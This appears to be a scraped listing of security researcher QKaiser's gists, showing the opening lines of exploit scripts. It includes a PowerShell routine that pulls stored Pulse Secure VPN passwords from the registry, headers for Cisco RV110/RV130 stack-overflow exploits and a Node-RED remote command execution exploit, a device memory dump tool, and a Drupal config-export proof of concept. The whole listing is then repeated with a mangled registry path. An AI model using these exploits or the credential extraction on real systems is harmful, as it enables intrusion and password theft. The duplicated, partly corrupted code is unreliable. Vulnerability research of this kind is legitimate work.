Quentin Kaiser QKaiser

## CVE-2020-8956.ps1
Add-Type -AssemblyName System.Security;

$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
    $ivename = $ive.PSPath.split('\')[-1].ToUpper()
    Write-Host "[+] Checking IVE $($ivename)..."
    $seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
    # 3 possible value names for password
    $encrypted = $ive.Password1
    if(!$encrypted){

## CVE_2019_1663_RV110.py
#!/usr/bin/env python
"""
Exploit for Cisco RV110 stack buffer overflow (CVE-2019-1663).
---------------------------------------------------------------
It simply executes a ret2libc, calling system() with whatever's on the stack
as argument. Offsets are for QEMU target.

First MIPS-based exploit, might delete later.
"""
import requests

## CVE_2019_1663_RV130.py
#!/usr/bin/env python
"""
Exploit for Cisco RV130 stack-based buffer overflow (CVE-2019-1663).

This piece of code will get you proper 'return to zero protection', that is
an executable stack (thanks, mprotect) and $pc pointing to the beginning of
the stack.

Enjoy your shells responsibly :)
"""

## mmc_dump.py
#!/usr/bin/env python
"""
Dump MMC memory from Airmedia AM-100 or similar devices.

# Dumping process steps

    * drop to u-boot shell
    * sanity check with printenv
    * load 512 bytes memory chunk from MMC to RAM at known safe address with "mmcread"
    * display 512 bytes of memory from RAM at known safe address with "md.b"

## noderedsh.py
#!/usr/bin/env python3
"""
----------------------------------------------------------------------------
"THE BEER-WARE LICENSE" (Revision 42):
QKaiser wrote this file. As long as you retain this notice you
can do whatever you want with this stuff. If we meet some day, and you think
this stuff is worth it, you can buy me a beer in return.
----------------------------------------------------------------------------
----------------------------------------------------------------------------
Node-RED Remote Command Execution exploit.

## setup.sh
#!/bin/bash
SDK_SHA512="02c6e8abbfa05072fbc139bc6c1d88245338631e7fa2776cbb2097ff1989fc6af595049a1bf7223dc0d39aa2bb1f31394cbadbcec45aa343d133f9f360675f99"
SDK_DOWNLOAD_LINK="https://www.eclipse.org/downloads/download.php?file=/equinox/drops/R-Oxygen.2-201711300510/equinox-SDK-Oxygen.2.zip&r=1"
SDK_FILENAME="equinox-SDK-Oxygen.2.zip"

echo "[+] Downloading SDK ..."
wget -q $SDK_DOWNLOAD_LINK -O $SDK_FILENAME

echo "[+] Checking checksums ..."
echo "$SDK_SHA512  $SDK_FILENAME" | sha512sum -c -

## SA_CORE_2016_004.sh
#!/bin/bash
#
# PoC for SA-CORE-2016-004
# Full config export can be downloaded without administrative permissions
#
# The idea is to grep for sensitive information within the exported
# config files. Feel free to add your own findings :)
#
###############################################################################
	Add-Type -AssemblyName System.Security;

	$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\\Software\Pulse Secure\Pulse\User Data\'
	foreach($ive in $ives) {
	$ivename = $ive.PSPath.split('\')[-1].ToUpper()
	Write-Host "[+] Checking IVE $($ivename)..."
	$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
	# 3 possible value names for password
	$encrypted = $ive.Password1
	if(!$encrypted){
	#!/usr/bin/env python
	"""
	Exploit for Cisco RV110 stack buffer overflow (CVE-2019-1663).
	---------------------------------------------------------------
	It simply executes a ret2libc, calling system() with whatever's on the stack
	as argument. Offsets are for QEMU target.

	First MIPS-based exploit, might delete later.
	"""
	import requests
	#!/usr/bin/env python
	"""
	Exploit for Cisco RV130 stack-based buffer overflow (CVE-2019-1663).

	This piece of code will get you proper 'return to zero protection', that is
	an executable stack (thanks, mprotect) and $pc pointing to the beginning of
	the stack.

	Enjoy your shells responsibly :)
	"""
	#!/usr/bin/env python
	"""
	Dump MMC memory from Airmedia AM-100 or similar devices.

	# Dumping process steps

	* drop to u-boot shell
	* sanity check with printenv
	* load 512 bytes memory chunk from MMC to RAM at known safe address with "mmcread"
	* display 512 bytes of memory from RAM at known safe address with "md.b"
	#!/usr/bin/env python3
	"""
	----------------------------------------------------------------------------
	"THE BEER-WARE LICENSE" (Revision 42):
	QKaiser wrote this file. As long as you retain this notice you
	can do whatever you want with this stuff. If we meet some day, and you think
	this stuff is worth it, you can buy me a beer in return.
	----------------------------------------------------------------------------
	----------------------------------------------------------------------------
	Node-RED Remote Command Execution exploit.
	#!/bin/bash
	SDK_SHA512="02c6e8abbfa05072fbc139bc6c1d88245338631e7fa2776cbb2097ff1989fc6af595049a1bf7223dc0d39aa2bb1f31394cbadbcec45aa343d133f9f360675f99"
	SDK_DOWNLOAD_LINK="https://www.eclipse.org/downloads/download.php?file=/equinox/drops/R-Oxygen.2-201711300510/equinox-SDK-Oxygen.2.zip&r=1"
	SDK_FILENAME="equinox-SDK-Oxygen.2.zip"

	echo "[+] Downloading SDK ..."
	wget -q $SDK_DOWNLOAD_LINK -O $SDK_FILENAME

	echo "[+] Checking checksums ..."
	echo "$SDK_SHA512 $SDK_FILENAME" \| sha512sum -c -
	#!/bin/bash
	#
	# PoC for SA-CORE-2016-004
	# Full config export can be downloaded without administrative permissions
	#
	# The idea is to grep for sensitive information within the exported
	# config files. Feel free to add your own findings :)
	#
	###############################################################################